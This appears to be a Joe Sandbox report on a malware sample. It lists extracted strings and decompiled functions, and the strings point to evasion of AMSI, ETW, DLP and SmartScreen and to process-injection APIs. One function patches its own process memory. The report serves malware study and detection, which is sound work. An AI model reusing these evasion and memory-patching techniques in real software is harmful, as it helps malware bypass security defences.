RtlAllocateHeap, xrefs: 03285D80, 03285DE6
EnumServicesStatusExA, xrefs: 03285EA0
UacScan, xrefs: 0327DC9A, 0327E001, 0327E9C5, 0327F1A1, 0327F495, 0327FB03, 03280F4C, 03284A35, 03284CF3, 03284FBB, 032850B8, 032855AD, 032856C4
Kernel32, xrefs: 03285ED2, 03285EE1, 03285F2C
WinHttp.WinHttpRequest.5.1, xrefs: 0327F509
EnumProcessModules, xrefs: 03285EBE
ScanString, xrefs: 0327D90D, 0327DE2C, 0327DECE, 0327DF5C, 0327E16C, 0327EBEA, 0327ED7D, 0327EF91, 0327F5A7, 0327F7BF, 0327F8DA, 0327FBFA, 0327FF21, 03280125, 03280343, 032805DB, 03280930, 03280B74, 03280E82, 032810B7, 03281268, 0328155D, 032816CC, 03281781, 03282114, 0328220B, 03283E5A, 03283F4C, 03284107, 0328474A, 032848B5, 03284B27, 0328535C, 03285430, 0328573D, 03285A6F, 03286033
ws2_32, xrefs: 03285F1D
RtlCreateQueryDebugBuffer, xrefs: 03285E19
C:\\Users\\Public\\Libraries\\, xrefs: 03280EF0
FlushInstructionCache, xrefs: 032861A6
CryptSIPGetSignedDataMsg, xrefs: 0327DAEB
NtMapViewOfSection, xrefs: 0328630B
NtQuerySecurityObject, xrefs: 03286371
NtOpenProcess, xrefs: 032852A4, 03286682
DllRegisterServer, xrefs: 0327DBE4
BCryptRegisterProvider, xrefs: 0327DB60, 03285240
DlpGetWebSiteAccess, xrefs: 03285D1A
mssip32, xrefs: 0327DAAE, 0327DAD5, 0327DAFC
NtWriteVirtualMemory, xrefs: 0328643D
DlpGetArchiveFileTraceInfo, xrefs: 03285CE7
NtOpenFile, xrefs: 03286470
DEEX, xrefs: 0327D8E7
bcrypt, xrefs: 0327DB23, 0327DB4A, 0327DB71, 0328521D, 03285231, 03285245, 03285AFA
EnumServicesStatusW, xrefs: 03285E91
Advapi, xrefs: 03285E87, 03285E96, 03285EA5, 03285EB4, 03285EF0, 03285EFF, 03285F0E
endpointdlp, xrefs: 03285C98, 03285CCB, 03285CFE, 03285D31
EtwEventWriteEx, xrefs: 032864A3
NtQueryVirtualMemory, xrefs: 0328623F
WriteVirtualMemory, xrefs: 03286173
OpenProcess, xrefs: 03286140
ScanBuffer, xrefs: 0327D9CF, 0327DD8C, 0327E26D, 0327E47B, 0327E56D, 0327E6D8, 0327E855, 0327E8CE, 0327EAC6, 0327EC8B, 0327EE8D, 0327F0AF, 0327F293, 0327F323, 0327F6B9, 0327F9F1, 0327FC98, 0327FE03, 03280013, 03280217, 03280435, 032806F7, 0328080B, 03280A22, 03280D90, 03280FC5, 0328135A, 0328144C, 03281C50, 03281DE1, 03281F78, 03282399, 03283D53, 03283FEE, 032841F9, 0328430A, 03284425, 032844BD, 03284536, 0328483C, 03284C7A, 03284D9E, 032851AA, 03285522, 03285626, 032858EE, 03285C0D, 03286596
CreateProcessAsUserA, xrefs: 03285EEB
^^Nc, xrefs: 0327EC5E
URL=file:", xrefs: 032815DA
Ntdll, xrefs: 03285E4B, 03285E5A, 03285E69, 03285E78
LdrLoadDll, xrefs: 032863D7
C:\Users\Public\, xrefs: 03280AA5, 03281868
kernel32, xrefs: 032860BE, 032860F1, 03286124, 03286157, 0328618A, 032861BD, 032861F0
CreateProcessW, xrefs: 03285EDC
CryptSIPVerifyIndirectData, xrefs: 0327DAC4
[InternetShortcut], xrefs: 032815CB
OpenSession, xrefs: 0327D96E, 0327E2E6, 0327E402, 0327E5E6, 0327E65F, 0327E7DC, 0327E947, 0327EA4D, 0327EB71, 0327EE14, 0327F036, 0327F128, 0327F39C, 0327F41C, 0327F52E, 0327F640, 0327F746, 0327F978, 0327FB81, 0327FD8A, 0327FF9A, 0328019E, 032803BC, 03280562, 03280792, 032808B7, 032809A9, 03280BED, 03280C9E, 03280E09, 03281130, 032811EF, 032812E1, 032814E4, 03281653, 032817FA, 03281BD7, 03281D68, 03281EFF, 0328209B, 03282320, 03283C61, 03283DE1, 03283ED3, 03284180, 03284291, 032843AC, 032845AF, 0328492E, 03284AAE, 03284C01, 03284E17, 03284EB2, 03285131, 032852E3, 032854A9, 03285875, 032859F6, 03285B1B, 03285FBA, 0328660F
can, xrefs: 0328247D
advapi32, xrefs: 03285281
Initialize, xrefs: 0327DC21, 0327E07A, 0327E1F4, 0327E389, 0327E4F4, 0327E763, 0327ED04, 0327EF18, 0327F21A, 0327F861, 0327FA8A, 0327FD11, 0327FEA8, 032800AC, 032802CA, 0328067E, 03280D17, 0328103E, 032813D3, 03281CEF, 03281E86, 03282022, 032822A7, 0328408E, 032847C3, 032849A7, 03284F2B, 03285034, 032857FC, 0328597D, 03285B94, 0328651D
HotKey=, xrefs: 0328175C
BCryptQueryProviderRegistration, xrefs: 0327DB39, 0328522C
SetUnhandledExceptionFilter, xrefs: 032861D9
VirtualProtect, xrefs: 0328610D
psapi, xrefs: 03285EC3
NtQuerySystemInformation, xrefs: 03285E46
UacInitialize, xrefs: 0327DD13, 0327E0F3, 03280AFB, 03283CDA, 03285F41
NtGetWriteWatch, xrefs: 0328620C
CreateProcessA, xrefs: 03285ECD
C:\Users\Public\Libraries, xrefs: 0327E1DF
wintrust, xrefs: 0327DA39, 0327DA60, 0327DA87
ntdll, xrefs: 03285259, 0328526D, 03285295, 032852A9, 03285D64, 03285D97, 03285DCA, 03285DFD, 03285E30, 03286223, 03286256, 03286289, 032862BC, 032862EF, 03286322, 03286355, 03286388, 032863BB, 032863EE, 03286421, 03286454, 03286487, 032864BA, 032864ED, 03286687
BCryptVerifySignature, xrefs: 0327DB12, 03285218, 03285AE3
VirtualAlloc, xrefs: 032860A7
http, xrefs: 0327F301
NtOpenObjectAuditAlarm, xrefs: 03285268
C:\Windows\System32\, xrefs: 0327DEA6, 03283FC8, 03284BB7
DlpCheckIsCloudSyncApp, xrefs: 03285CB4
RtlQueryProcessDebugInformation, xrefs: 03285E73
DllGetClassObject, xrefs: 0327DB87
NtSetSecurityObject, xrefs: 03285290
C:\Windows\SysWOW64, xrefs: 0328227F
DlpNotifyPreDragDrop, xrefs: 03285C81
connect, xrefs: 03285F18
smartscreenps, xrefs: 0327DB98, 0327DBC8, 0327DBFB
DllGetActivationFactory, xrefs: 0327DBB1
NtAlertResumeThread, xrefs: 03285D4D
I_QueryTagInformation, xrefs: 0328527C
GET, xrefs: 0327F61C
CryptSIPGetInfo, xrefs: 0327DA9D
NtQueryDirectoryFile, xrefs: 03285E64
WintrustAddActionID, xrefs: 0327DA4F
FindCertsByIssuer, xrefs: 0327DA76
EnumServicesStatusExW, xrefs: 03285EAF
NtReadVirtualMemory, xrefs: 03285254, 0328633E
acS, xrefs: 0328246A
NtCreateSection, xrefs: 032862D8
TrustOpenStores, xrefs: 0327DA28
NtWaitForSingleObject, xrefs: 03285DB3
VirtualAllocEx, xrefs: 032860DA
CreateProcessWithLogonW, xrefs: 03285F09
CreateProcessAsUserW, xrefs: 03285EFA, 03285F27
.url, xrefs: 03280AB0

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: File$AttributesCreateLibraryPath$AddressCloseCounterDirectoryFreeHandleInetLoadModuleNameName_OfflinePerformanceProcQueryWrite
String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$ScanBuffer$ScanString$SetUnhandledExceptionFilter$TrustOpenStores$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$wintrust$ws2_32
API String ID: 598625507-512624929
Opcode ID: 7f302017b6b34972a9e959ba0e0f2c91240a33012cddaa84eedaee5b5fa0511d
Instruction ID: f8acb26069c816b1e835857adb3d1ffffb074d93317ce069146aac9330f8325c
Opcode Fuzzy Hash: 7f302017b6b34972a9e959ba0e0f2c91240a33012cddaa84eedaee5b5fa0511d
Instruction Fuzzy Hash: E3D34D39B2125C9FDB11FB65DC80ADE73B9EF85301F5084E29148AB254DEB1AEC58F90

Uniqueness

Uniqueness Score: -1.00%

Function 03265A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E03265A90(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x3265b95);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E032658CC( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E03265CFC, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E03265B9C);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								while( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
								}
								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}

0x03265a91
0x03265a93
0x03265a9b
0x03265aac
0x03265ab1
0x03265aca
0x03265ad1
0x03265b13
0x03265b15
0x03265b16
0x03265b1b
0x03265b1e
0x03265b21
0x03265b33
0x03265b56
0x03265b76
0x03265b76
0x03265b7a
0x03265b80
0x03265b83
0x03265b86
0x03265b94
0x03265ad3
0x03265ae8
0x03265aef
0x00000000
0x03265af1
0x03265b06
0x03265b0d
0x03265bac
0x03265bbf
0x03265bc4
0x03265bcd
0x03265bf7
0x03265bfc
0x03265bfb
0x03265bfb
0x03265c0b
0x03265c13
0x03265c19
0x03265c1e
0x03265c31
0x03265c46
0x03265c46
0x03265c4a
0x03265c69
0x03265c7e
0x03265c82
0x03265c84
0x03265c9f
0x03265cb4
0x03265cb4
0x03265c82
0x03265c4a
0x03265c13
0x03265cbd
0x00000000
0x00000000
0x00000000
0x03265b0d
0x03265aef

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,03260000,03289790), ref: 03265AAC
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265ACA
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,03260000,03289790), ref: 03265AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03265B06
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03265B4F
RegQueryValueExA.ADVAPI32(?,03265CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,03265B95,?,80000001), ref: 03265B6D
RegCloseKey.ADVAPI32(?,03265B9C,00000000,?,?,00000000,03265B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03265B8F
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03265BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 03265BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 03265BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 03265BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 03265C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 03265C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 03265C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 03265CAF

Strings

Software\Borland\Locales, xrefs: 03265AC0, 03265ADE
Software\Borland\Delphi\Locales, xrefs: 03265AFC

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: ce4e145d19a5e8b9408aa936956d2afb664d99c951fcce5909afcc0c12109b55
Instruction ID: c0b279d8a70ff75f6e0777050dd92238ea85b0d156c568c7560f366b3ed408ee
Opcode Fuzzy Hash: ce4e145d19a5e8b9408aa936956d2afb664d99c951fcce5909afcc0c12109b55
Instruction Fuzzy Hash: C051C775A6031D7EFB21D6A4CC46FEFB7AC9F05740F5401A5A700EA1C1E6B4BAC48BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0327CBE8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0327CBE8(char __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				void* _v12;
				char _v20;
				void* _v28;
				void* _v52;
				intOrPtr _v68;
				void _v76;
				void* _t49;
				intOrPtr _t56;
				intOrPtr _t58;
				void* _t61;

				_t49 = __edx;
				_v8 = __eax;
				E03264EE4( &_v8);
				_push(_t61);
				_push(0x327ccb8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffb8;
				E032644A0(_t49);
				_push(0);
				_push(0);
				_push( &_v20);
				_push(E03264DB4(_v8));
				L0327CA44();
				E0327CA4C( &_v52, 0x40,  &_v20, 0, 0, 0);
				NtOpenFile( &_v12, 0x100001,  &_v52,  &_v28, 1, 0x20); // executed
				NtQueryInformationFile(_v12,  &_v28,  &_v76, 0x18, 5);
				_t58 = _v68;
				E03264B90(_t49, _t58);
				_push(0);
				_push(0);
				_push(_t58);
				_push(E032649BC(_t49));
				_push( &_v28);
				_push(0);
				_push(0);
				_push(0);
				_push(_v12); // executed
				L03277D28(); // executed
				NtClose(_v12);
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x327ccbf);
				return E03264C24( &_v8);
			}

0x0327cbf0
0x0327cbf2
0x0327cbf8
0x0327cbff
0x0327cc00
0x0327cc05
0x0327cc08
0x0327cc0d
0x0327cc12
0x0327cc14
0x0327cc19
0x0327cc22
0x0327cc23
0x0327cc39
0x0327cc53
0x0327cc68
0x0327cc6d
0x0327cc74
0x0327cc79
0x0327cc7b
0x0327cc7d
0x0327cc85
0x0327cc89
0x0327cc8a
0x0327cc8c
0x0327cc8e
0x0327cc93
0x0327cc94
0x0327cc9d
0x0327cca4
0x0327cca7
0x0327ccaa
0x0327ccb7

APIs

Part of subcall function 03264EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03264EF2

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0327CCB8), ref: 0327CC23
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0327CCB8), ref: 0327CC53
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0327CC68
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0327CC94
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0327CC9D

Part of subcall function 03264C24: SysFreeString.OLEAUT32(0327D70C), ref: 03264C32

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 250c3baf7c25803ea1de1d9971857a30ac413610ea72c4625f1552179047c85b
Instruction ID: 389c3207ad63e199ce46b9b280b27efe1f290529ebcad7d78419924b1a442540
Opcode Fuzzy Hash: 250c3baf7c25803ea1de1d9971857a30ac413610ea72c4625f1552179047c85b
Instruction Fuzzy Hash: A821A175A50318BADB11EAE5CC52FEE77ACAF09B00F500466B600FB180D6B4AA858794

Uniqueness

Uniqueness Score: -1.00%

Function 03277B88 Relevance: 6.0, APIs: 4, Instructions: 32
nativeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E03277B88(PVOID* __eax, signed int __ecx, void* __edx) {
				PVOID* _v12;
				void _v28;
				long* _t4;
				long* _t5;
				long _t13;
				void* _t14;
				signed int _t20;

				_push(__ecx);
				_t20 = __ecx;
				_t14 = __edx;
				_v12 = __eax;
				_t4 =  *0x329e354; // 0x4
				_t5 = __ecx * 0x32;
				NtProtectVirtualMemory(GetCurrentProcess(), _v12, _t5, 0x40, _t4);
				E03277B7C(_t14, _t20, _v28);
				_t13 = NtWriteVirtualMemory(GetCurrentProcess(),  &_v28, _t14, 4, 0x329e354); // executed
				return _t13;
			}

0x03277b8a
0x03277b8b
0x03277b8d
0x03277b8f
0x03277b92
0x03277b9a
0x03277ba9
0x03277bb5
0x03277bcd
0x03277bd5

APIs

GetCurrentProcess.KERNEL32(00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000,00000000,00000000,00000000,00000000,00000000), ref: 03277BA3
NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000,00000000,00000000,00000000,00000000), ref: 03277BA9
GetCurrentProcess.KERNEL32(00000000,0329E34C,00000004,0329E354,00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C,73990000), ref: 03277BC7
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,0329E34C,00000004,0329E354,00000000,00000000,00000004,00000040,00000004,00000005,?,03266748,03277C01,?,03277C7C), ref: 03277BCD

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: CurrentMemoryProcessVirtual$ProtectWrite
String ID:
API String ID: 1222570558-0
Opcode ID: 94a844dcfa0a822d7ef2258a37128adb64e839401edd50d5dd37d7f99978d9c3
Instruction ID: 8deb46cb332ca2c0c25de5ade7c00fc194e6cdd3508cd5d1f3ab7b27a4119f94
Opcode Fuzzy Hash: 94a844dcfa0a822d7ef2258a37128adb64e839401edd50d5dd37d7f99978d9c3
Instruction Fuzzy Hash: 14E0E5B67193107FD604FAAC9D84E7B67DC9F8C610F11442AB348DB250C5B49884876D

Uniqueness

Uniqueness Score: -1.00%

Function 03276DC0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E03276DC0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v24;
				char _v28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t36;

				_t34 = _t35;
				_t36 = _t35 + 0xffffffd8;
				_push(__esi);
				_v28 = 0;
				_v8 = __eax;
				_push(_t34);
				_push(0x3276e93);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				_push(_t34);
				_push(0x3276e23);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E03276D64(_v8, __edx, 0,  &_v24, __esi, __eflags); // executed
				_push(E03265E70(__edx));
				_push(0x3276ea4);
				_push(5);
				_push( &_v24); // executed
				L0326CDA4(); // executed
				E03276D54( &_v24);
				_pop(_t29);
				 *[fs:eax] = _t29;
				_t30 = 0;
				 *[fs:eax] = _t30;
				_push(0x3276e9a);
				return E032644A0( &_v28);
			}

0x03276dc1
0x03276dc3
0x03276dc7
0x03276dcb
0x03276dd0
0x03276dd5
0x03276dd6
0x03276ddb
0x03276dde
0x03276de3
0x03276de4
0x03276de9
0x03276dec
0x03276df5
0x03276e01
0x03276e02
0x03276e07
0x03276e0e
0x03276e0f
0x03276e14
0x03276e1b
0x03276e1e
0x03276e7f
0x03276e82
0x03276e85
0x03276e92

APIs

Part of subcall function 03276D64: CLSIDFromProgID.OLE32(00000000,?,00000000,03276DB1,?,?,?,00000000), ref: 03276D91

CoCreateInstance.OLE32(?,00000000,00000005,03276EA4,00000000,00000000,03276E23,?,00000000,03276E93), ref: 03276E0F

Memory Dump Source

Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true

Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd

Similarity

API ID: CreateFromInstanceProg
String ID:
API String ID: 2151042543-0
Opcode ID: a9052069faa683cba48dffbf78e4a70e43c7004f63e5de75c29904c8f5c5937b
Instruction ID: 81f55831c6a138fb3eeb8ba82bb1f41ac4d0048e42ed48b3320d060752a21226
Opcode Fuzzy Hash: a9052069faa683cba48dffbf78e4a70e43c7004f63e5de75c29904c8f5c5937b
Instruction Fuzzy Hash: 0801DF35638B04AFDB11DFA0DC52D6FBBACFB49B10B614475F900E6A40E6B05980C9B5

Uniqueness

Uniqueness Score: -1.00%

Function 03261724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E03261724(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t129 =  *0x329b04d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E03261644();
								_t99 =  *0x329d7b0; // 0x7fde0000
								 *_t147 = 0x329d7ac;
								 *0x329d7b0 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x329d7a8 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x329b718], ah");
								if(__eflags == 0) {
									goto L39;
								}
								Sleep(0);
								asm("lock cmpxchg [0x329b718], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									continue;
								}
								goto L39;
							}
						}
						L39:
						_t141 = _t125 - 0xb30;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x329b728 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x329b724;
